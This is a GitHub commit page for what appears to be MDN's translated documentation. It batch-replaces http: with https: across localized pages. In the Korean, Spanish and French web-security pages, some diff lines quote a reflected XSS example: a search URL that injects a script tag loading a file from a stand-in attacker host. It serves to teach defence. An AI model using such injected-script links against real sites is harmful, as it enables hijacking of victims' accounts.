Skip to content

Commit

Permalink
chore: batch replace http: with https: (#20093)
Browse files Browse the repository at this point in the history
Co-authored-by: SphinxKnight <[email protected]>
  • Loading branch information
PassionPenguin and SphinxKnight committed May 27, 2024
1 parent ad06551 commit f815d40
Show file tree
Hide file tree
Showing 43 changed files with 77 additions and 65 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ XSS는 공격자가 클라이언트 측 스크립트를 웹 사이트에 삽입
삽입된 스크립트를 브라우저에 반환하도록 사이트를 속이는 데에는 두 가지 주요 접근방법이 있다. 그것은 반사적 XSS 취약점과 지속적 XSS 취약점이다.

- A _reflected_ XSS vulnerability occurs when user content that is passed to the server is returned _immediately_ and _unmodified_ for display in the browser — any scripts in the original user content will be run when the new page is loaded!
For example, consider a site search function where the search terms are encoded as URL parameters, and these terms are displayed along with the results. An attacker can construct a search link containing a malicious script as a parameter (e.g. `http://mysite.com?q=beer<script%20src="http://evilsite.com/tricky.js"></script>`) and email it to another user. If the target user clicks this "interesting link", the script will be executed when the search results are displayed. As discussed above, this gives the attacker all the information they need to enter the site as the target user — potentially making purchases as the user or sharing their contact information.
For example, consider a site search function where the search terms are encoded as URL parameters, and these terms are displayed along with the results. An attacker can construct a search link containing a malicious script as a parameter (e.g. `https://developer.mozilla.org?q=beer<script%20src="http://example.com/tricky.js"></script>`) and email it to another user. If the target user clicks this "interesting link", the script will be executed when the search results are displayed. As discussed above, this gives the attacker all the information they need to enter the site as the target user — potentially making purchases as the user or sharing their contact information.
- A _persistent_ XSS vulnerability is one where the malicious script is _stored_ by the website and then later redisplayed unmodified for other users to unwittingly execute.
For example, a discussion board that accepts comments containing unmodified HTML could store a malicious script from an attacker. When the comments are displayed the script is executed and can then send the attacker information required to access the user's account. This sort of attack is extremely popular and powerful, because the attacker doesn't have to have any direct engagement with the victims.

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ XSS es un término que se usa para describir una clase de ataques que permiten a
Hay dos aproximaciones principales para conseguir que el sitio devuelva scripts inyectados al explorador — se conocen como vulnerabilidades XSS _reflejadas_ y _persistentes_.

- Una vulnerabilidad XSS _reflejada_ ocurre cuando contenido del usuario que se pasa al servidor se devuelve _inmediatamente y sin modificar_ par que los muestre el explorador — ¡cualquier script en el contenido original del usuario se ejecutará cuando se cargue una nueva página!
Por ejemplo, considera una función de búsqueda en un sitio donde los términos de búsqueda están codificados como parámetros URL y estos términos se presentan junto con los resultados. Un atacante puede construir un enlace de búsqueda que contenga un script malicioso como parámetro (ej. `http://mysite.com?q=beer<script%20src="http://evilsite.com/tricky.js"></script>`) y enviarlo como enlace en un correo electrónico a otro usuario: Si el destinatario pincha en este "enlace interesante", el script se ejecutará cuando se muestren en pantalla los resultados de la búsqueda. Como discutimos arriba, ésto da al atacante toda la información que necesita para entrar en el sitio como si fuera el usuario destinatario — realizando compras potencialmente como si fuera el usuario o compartiendo su información de contactos.
Por ejemplo, considera una función de búsqueda en un sitio donde los términos de búsqueda están codificados como parámetros URL y estos términos se presentan junto con los resultados. Un atacante puede construir un enlace de búsqueda que contenga un script malicioso como parámetro (ej. `https://developer.mozilla.org?q=beer<script%20src="http://example.com/tricky.js"></script>`) y enviarlo como enlace en un correo electrónico a otro usuario: Si el destinatario pincha en este "enlace interesante", el script se ejecutará cuando se muestren en pantalla los resultados de la búsqueda. Como discutimos arriba, ésto da al atacante toda la información que necesita para entrar en el sitio como si fuera el usuario destinatario — realizando compras potencialmente como si fuera el usuario o compartiendo su información de contactos.
- Una vulnerabilidad _XSS persistente_ es aquella en la que el script malicioso se _almacena_ en el sitio web y luego más tarde se vuelve a presentar en pantalla sin modificar para que otros usuarios lo ejecuten involuntariamente. Por ejemplo, un foro de discusión que accepta comentarios que contengan HTML sin modificar, podría almacenar un script malicioso de un atacante. Cuando se muestren los comentarios se ejecutará el script y enviará al atacante la información requerida para acceder a la cuenta del usuario. Esta clase de ataque es extremadamente popular y muy potente, porque el atacante no tiene que tener ninguna relación directa con las víctimas.

Si bien los datos `POST` o `GET` son las fuentes más comunes de vulnerabilidades, cualquier dato del explorador es vulnerable potencialmente (incluyendo los datos de cookies renderizados por el explorador, o los ficheros de los usuarios que éste sube o que se muestran).
Expand Down
6 changes: 3 additions & 3 deletions files/es/web/api/document_object_model/examples/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -46,13 +46,13 @@ El ejemplo siguiente muestra el uso de las propiedades de alto (`height`) y anch
La 1ª imagen: - alto (height): no - ancho (width): no - estilo (style): no
<img
id="imagen1"
src="http://www.mozilla.org/images/mozilla-banner.gif" />
src="https://www.mozilla.org/images/mozilla-banner.gif" />
</p>
<p>
La 2ª imagen: - height="50" - width="500" - style: no
<img
id="imagen2"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
height="50"
width="500" />
</p>
Expand All @@ -61,7 +61,7 @@ El ejemplo siguiente muestra el uso de las propiedades de alto (`height`) y anch
<img
id="imagen3"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
style="height: 50px; width: 500px;" />
</p>

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -291,7 +291,7 @@ function FileUpload(img, file) {
canvas.parentNode.removeChild(canvas);
}, false);
xhr.open("POST", "http://demos.hacks.mozilla.org/paul/demos/resources/webservices/devnull.php");
xhr.open("POST", "https://demos.hacks.mozilla.org/paul/demos/resources/webservices/devnull.php");
xhr.overrideMimeType('text/plain; charset=x-user-defined-binary');
xhr.sendAsBinary(file.getAsBinary());
}
Expand Down
2 changes: 1 addition & 1 deletion files/es/web/api/notification/click_event/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -25,7 +25,7 @@ En el siguiente ejemplo, utilizamos un manejador `onclick` para abrir un sitio w
```js
notification.onclick = function (event) {
event.preventDefault(); // Evita que el navegador enfoque la pestaña del Notification
window.open("http://www.mozilla.org", "_blank");
window.open("https://www.mozilla.org", "_blank");
};
```

Expand Down
2 changes: 1 addition & 1 deletion files/es/web/api/window/closed/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@ El siguiente ejemplo demuestra cómo una ventana emergente puede cambiar la URL
```js
// Verifica que opener existe y no esté cerrado
if (window.opener && !window.opener.closed) {
window.opener.location.href = "http://www.mozilla.org";
window.opener.location.href = "https://www.mozilla.org";
}
```

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ XSS est un terme utilisé pour décrire une classe d'attaque qui permet à l'att
Il y a deux manières principales pour demander au site de retourner un script injecté vers un navigateur web — elles sont désignées en tant que vulnérabilités XSS _réfléchie_ et _persistante_.

- Une vulnérabilité XSS réfléchie se produit quand le contenu de l'utilisateur transmis au serveur est immédiatement retourné, sans avoir été modifié, pour être affiché dans le navigateur — tout les scripts présents dans le contenu d'origine seront exécutés quand la nouvelle page sera chargée!
On prendra par exemple une fonction de recherche dans un site où les termes recherchés sont encodés en tant que paramètres dans l'URL, et que ces termes sont affichés en permanence avec les résultats. Un attaquant peut construire un lien de recherche contenant un script malicieux en tant que paramètre (ex: `http://mysite.com?q=beer<script%20src="http://sitedangereux.com/malicieux.js"></script>`) et le transmettre par e-mail à un autre utilisateur. Si l'utilisateur ciblé clique sur ce "lien intéressant", le script sera exécuté quand les résultats de la recherche seront affichés. Comme vu auparavant, cela donne à l'attaquant toute les informations dont il a besoin pour se connecter sur le site avec le compte de la victime — potentiellement faire des achats en tant que cet utilisateur ou accèder à la liste de contacts..
On prendra par exemple une fonction de recherche dans un site où les termes recherchés sont encodés en tant que paramètres dans l'URL, et que ces termes sont affichés en permanence avec les résultats. Un attaquant peut construire un lien de recherche contenant un script malicieux en tant que paramètre (ex: `https://developer.mozilla.org?q=beer<script%20src="http://example.com/script_malveillant.js"></script>`) et le transmettre par e-mail à un autre utilisateur. Si l'utilisateur ciblé clique sur ce "lien intéressant", le script sera exécuté quand les résultats de la recherche seront affichés. Comme vu auparavant, cela donne à l'attaquant toute les informations dont il a besoin pour se connecter sur le site avec le compte de la victime — potentiellement faire des achats en tant que cet utilisateur ou accèder à la liste de contacts..
- Une vulnérabilité XSS _persistante_ sera celle où le script malicieux est stocké sur le site web puis affiché, sans modification, un peu plus tard par les autres utilisateurs et exécuté à leur insu.
Par exemple, un écran de discussion qui accepte les commentaires contenant du code HTML pur peuvent stocker le script malicieux de l'attaquant. Quand les commentaires sont affichés le script est exécuté et peut ensuite transmettre à l'attaquant les informations nécessaires pour accèder au compte de l'utilisateur. Cette méthode d'attaque est extrêmement courante et efficace, parce que l'attaquant n'a pas besoin d'avoir une relation directe avec les victimes.

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -37,6 +37,6 @@ Assurez-vous de tester en profondeur votre extension sous Firefox 2 avant de la

## Étape 4&nbsp;: Publication

Mettez à jour la description de votre extension sur <http://addons.mozilla.org>, pour vous assurez que les utilisateurs la retrouveront.
Mettez à jour la description de votre extension sur <https://addons.mozilla.org>, pour vous assurez que les utilisateurs la retrouveront.

De plus, si le manifeste d'installation contient une [`URL de mise à jour`](/fr/Manifestes_d'installation#updateURL), vérifiez qu'elle est valide pour que Firefox puisse automatiquement trouver les nouvelles versions de votre extension. De cette manière, Firefox proposera de l'installer automatiquement au premier lancement de l'extension après le passage à Firefox 2.
8 changes: 5 additions & 3 deletions files/fr/web/api/document_object_model/examples/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -49,14 +49,16 @@ L'exemple qui suit montre l'utilisation des propriétés `height` et `width` pou
<body onload="init();">
<p>
Image 1: no height, width, or style
<img id="image1" src="http://www.mozilla.org/images/mozilla-banner.gif" />
<img
id="image1"
src="https://www.mozilla.org/images/mozilla-banner.gif" />
</p>

<p>
Image 2: height="50", width="500", but no style
<img
id="image2"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
height="50"
width="500" />
</p>
Expand All @@ -65,7 +67,7 @@ L'exemple qui suit montre l'utilisation des propriétés `height` et `width` pou
Image 3: no height, width, but style="height: 50px; width: 500px;"
<img
id="image3"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
style="height: 50px; width: 500px;" />
</p>

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -415,7 +415,7 @@ function FileUpload(img, file) {
);
xhr.open(
"POST",
"http://demos.hacks.mozilla.org/paul/demos/resources/webservices/devnull.php",
"https://demos.hacks.mozilla.org/paul/demos/resources/webservices/devnull.php",
);
xhr.overrideMimeType("text/plain; charset=x-user-defined-binary");
reader.onload = (evt) => {
Expand Down
2 changes: 1 addition & 1 deletion files/fr/web/api/notification/click_event/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@ Dans l'exemple qui suit, on utilise le gestionnaire d'évènement `onclick` pour
```js
notification.onclick = function (event) {
event.preventDefault(); // empêcher le navigateur de passer le focus sur l'onglet de la navigation
window.open("http://www.mozilla.org", "_blank");
window.open("https://www.mozilla.org", "_blank");
};
```

Expand Down
2 changes: 1 addition & 1 deletion files/fr/web/http/headers/origin/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -71,7 +71,7 @@ Origin: https://developer.mozilla.org
```

```http
Origin: http://developer.mozilla.org:80
Origin: https://developer.mozilla.org:80
```

## Spécifications
Expand Down
4 changes: 2 additions & 2 deletions files/ja/mdn/community/issues/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
title: 課題の作成と作業のガイドライン
slug: MDN/Community/Issues
l10n:
sourceCommit: a15be9cc426c19e3a1a510a49c4615d56ba4415d
sourceCommit: 94ef07a7b073c2663cbace0667bdb717a40bfa28
---

{{MDNSidebar}}
Expand Down Expand Up @@ -81,7 +81,7 @@ MDN Web Docs のコンテンツやウェブサイトの外観に関するバグ

### 説明

CSS プロパティページのテンプレートは[こちら](https://developer.mozilla.org/ja/docs/MDN/Writing_guidelines/Page_structures/Page_types/CSS_property_page_template)で定義されています。
CSS プロパティページのテンプレートは[こちら](/ja/docs/MDN/Writing_guidelines/Page_structures/Page_types/CSS_property_page_template)で定義されています。
この課題のタスクリストは、文書化された CSS プロパティをテンプレートと比較し、準拠のためにプロパティページの変更を追跡するために使用されます。

### チェックするページの一覧
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -37,6 +37,6 @@ Firefox 2 はデフォルトのテーマに変更を加えています。さら

## ステップ 4: リリース

[http://addons.mozilla.org](https://addons.mozilla.org) 上のあなたの拡張機能のエントリーを更新してください。ユーザーが更新を見つけられるようになります。
[https://addons.mozilla.org](https://addons.mozilla.org) 上のあなたの拡張機能のエントリーを更新してください。ユーザーが更新を見つけられるようになります。

さらに、あなたの拡張機能のインストール定義ファイルで [`updateURL`](/ja/Install_Manifests#updateURL) を提供している場合は、必ず update manifest を更新し、Firefox が自動的に拡張機能の新バージョンを見つけられるようにしてください。こうすることによって、ユーザーが Firefox 2 にアップグレードした後で最初にあなたの拡張機能を実行した時、新バージョンを自動的にインストールさせることができます。
8 changes: 5 additions & 3 deletions files/ja/web/api/document_object_model/examples/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -53,14 +53,16 @@ l10n:
<body onload="init();">
<p>
Image 1: no height, width, or style
<img id="image1" src="http://www.mozilla.org/images/mozilla-banner.gif" />
<img
id="image1"
src="https://www.mozilla.org/images/mozilla-banner.gif" />
</p>

<p>
Image 2: height="50", width="500", but no style
<img
id="image2"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
height="50"
width="500" />
</p>
Expand All @@ -69,7 +71,7 @@ l10n:
Image 3: no height, width, but style="height: 50px; width: 500px;"
<img
id="image3"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
style="height: 50px; width: 500px;" />
</p>

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -444,7 +444,7 @@ function FileUpload(img, file) {
);
xhr.open(
"POST",
"http://demos.hacks.mozilla.org/paul/demos/resources/webservices/devnull.php",
"https://demos.hacks.mozilla.org/paul/demos/resources/webservices/devnull.php",
);
xhr.overrideMimeType("text/plain; charset=x-user-defined-binary");
reader.onload = (evt) => {
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -46,7 +46,7 @@ dt.setData("text/plain", "https://www.mozilla.org");
例えば、以下のサンプル `text/uri-list` データには、2 つのリンクと 1 つのコメントが含まれています。

```
http://www.mozilla.org
https://www.mozilla.org
# 2 つ目のリンク
http://www.example.com
```
Expand All @@ -62,7 +62,7 @@ const url = event.dataTransfer.getData("URL");
Mozilla 特有の型として、`text/x-moz-url` 型のデータを見かけることがあるかもしれません。この型が表示される場合は、`text/uri-list` 型の前に表示されるはずです。この型のデータは、リンクの URL に続いてリンクのタイトルが保持されており。例えば、以下のようになります。

```
http://www.mozilla.org
https://www.mozilla.org
Mozilla
http://www.example.com
Example
Expand Down
2 changes: 1 addition & 1 deletion files/ja/web/api/notification/click_event/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -32,7 +32,7 @@ onclick = (event) => {};
```js
notification.onclick = (event) => {
event.preventDefault(); // prevent the browser from focusing the Notification's tab
window.open("http://www.mozilla.org", "_blank");
window.open("https://www.mozilla.org", "_blank");
};
```

Expand Down
2 changes: 1 addition & 1 deletion files/ja/web/api/window/closed/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@ var isClosed = windowRef.closed;
```js
// 開いた側のウィンドウが存在するか、かつ、閉じられていないかを調べます。
if (window.opener && !window.opener.closed) {
window.opener.location.href = "http://www.mozilla.org";
window.opener.location.href = "https://www.mozilla.org";
}
```

Expand Down
2 changes: 1 addition & 1 deletion files/ja/web/http/headers/origin/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -77,7 +77,7 @@ Origin: https://developer.mozilla.org
```

```http
Origin: http://developer.mozilla.org:80
Origin: https://developer.mozilla.org:80
```

## 仕様書
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -128,7 +128,7 @@ PAC ファイルを作成するために、以下の関数を使用できます
> **メモ:** 以下の例をテストするために、 pactester ([pacparser](https://github.com/manugarg/pacparser) パッケージの一部) を使用しました。
>
> - PAC ファイルは `proxy.pac` という名前です
> - コマンドライン: `pactester -p ~/pacparser-master/tests/proxy.pac -u http://www.mozilla.org` (引数 `host``www.mozilla.org` を、引数 `url``http://www.mozilla.org` を渡します)
> - コマンドライン: `pactester -p ~/pacparser-master/tests/proxy.pac -u https://www.mozilla.org` (引数 `host``www.mozilla.org` を、引数 `url``https://www.mozilla.org` を渡します)

### isPlainHostName()

Expand Down
8 changes: 5 additions & 3 deletions files/ko/web/api/document_object_model/examples/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -49,22 +49,24 @@ slug: Web/API/Document_Object_Model/Examples
<body onload="init();">
<p>
이미지 1: 높이, 너비, 스타일 없음
<img id="image1" src="http://www.mozilla.org/images/mozilla-banner.gif" />
<img
id="image1"
src="https://www.mozilla.org/images/mozilla-banner.gif" />
</p>

<p>
이미지 2: 높이="50", 너비="500", 스타일 없음
<img
id="image2"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
height="50"
width="500" />
</p>
<p>
이미지 3: 높이, 너비 없음, 스타일="height: 50px; width: 500px;"
<img
id="image3"
src="http://www.mozilla.org/images/mozilla-banner.gif"
src="https://www.mozilla.org/images/mozilla-banner.gif"
style="height: 50px; width: 500px;" />
</p>
<div id="output"></div>
Expand Down
Loading

0 comments on commit f815d40

Please sign in to comment.